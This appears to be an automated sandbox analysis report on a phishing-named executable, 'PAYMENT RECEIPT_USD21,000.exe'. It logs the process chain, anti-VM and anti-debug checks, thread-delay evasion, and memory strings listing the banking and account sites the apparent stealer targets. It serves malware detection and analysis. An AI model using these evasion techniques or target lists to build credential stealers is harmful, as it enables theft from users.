                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PAYMENT RECEIPT_USD21,000.exe PID: 1680, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fttQgpyzkkc.exe PID: 7436, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\wlanext.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 2D30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 4D30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 8CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 9CA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: 9EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeMemory allocated: AEA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 8970000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 9970000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: 9B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeMemory allocated: AB50000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D1C0 rdtsc 9_2_0115D1C0
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6397Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7314Jump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 401
                Source: C:\Windows\SysWOW64\wlanext.exeWindow / User API: threadDelayed 9572
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.8 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.3 %
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe TID: 1124Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 6397 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe TID: 7516Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exe TID: 7856Thread sleep count: 401 > 30
                Source: C:\Windows\SysWOW64\wlanext.exe TID: 7856Thread sleep time: -802000s >= -30000s
                Source: C:\Windows\SysWOW64\wlanext.exe TID: 7856Thread sleep count: 9572 > 30
                Source: C:\Windows\SysWOW64\wlanext.exe TID: 7856Thread sleep time: -19144000s >= -30000s
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe TID: 7884Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe TID: 7884Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe TID: 7884Thread sleep time: -41000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 021oRg3.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                Source: 021oRg3.17.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 021oRg3.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: wlanext.exe, 00000011.00000002.4521627919.00000000082C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: exp_yearINTEGERmVMware
                Source: 021oRg3.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 021oRg3.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 021oRg3.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 021oRg3.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 021oRg3.17.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: wlanext.exe, 00000011.00000002.4521627919.00000000082C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mVMware
                Source: 021oRg3.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: VfJW2xm7a.exe, 00000012.00000002.4518413821.0000000000879000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.2580831144.0000028C65A0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 021oRg3.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 021oRg3.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 021oRg3.17.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 021oRg3.17.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 021oRg3.17.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 021oRg3.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 021oRg3.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 021oRg3.17.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 021oRg3.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 021oRg3.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D1C0 rdtsc 9_2_0115D1C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417A83 LdrLoadDll,9_2_00417A83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A118 mov ecx, dword ptr fs:[00000030h]9_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A118 mov eax, dword ptr fs:[00000030h]9_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A118 mov eax, dword ptr fs:[00000030h]9_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118A118 mov eax, dword ptr fs:[00000030h]9_2_0118A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A0115 mov eax, dword ptr fs:[00000030h]9_2_011A0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01110124 mov eax, dword ptr fs:[00000030h]9_2_01110124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB136 mov eax, dword ptr fs:[00000030h]9_2_010DB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB136 mov eax, dword ptr fs:[00000030h]9_2_010DB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB136 mov eax, dword ptr fs:[00000030h]9_2_010DB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DB136 mov eax, dword ptr fs:[00000030h]9_2_010DB136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E1131 mov eax, dword ptr fs:[00000030h]9_2_010E1131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E1131 mov eax, dword ptr fs:[00000030h]9_2_010E1131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9148 mov eax, dword ptr fs:[00000030h]9_2_010D9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9148 mov eax, dword ptr fs:[00000030h]9_2_010D9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9148 mov eax, dword ptr fs:[00000030h]9_2_010D9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D9148 mov eax, dword ptr fs:[00000030h]9_2_010D9148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B5152 mov eax, dword ptr fs:[00000030h]9_2_011B5152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01178158 mov eax, dword ptr fs:[00000030h]9_2_01178158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov eax, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov eax, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov ecx, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov eax, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01174144 mov eax, dword ptr fs:[00000030h]9_2_01174144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01173140 mov eax, dword ptr fs:[00000030h]9_2_01173140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01173140 mov eax, dword ptr fs:[00000030h]9_2_01173140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01173140 mov eax, dword ptr fs:[00000030h]9_2_01173140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E6154 mov eax, dword ptr fs:[00000030h]9_2_010E6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E6154 mov eax, dword ptr fs:[00000030h]9_2_010E6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DC156 mov eax, dword ptr fs:[00000030h]9_2_010DC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E7152 mov eax, dword ptr fs:[00000030h]9_2_010E7152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01179179 mov eax, dword ptr fs:[00000030h]9_2_01179179
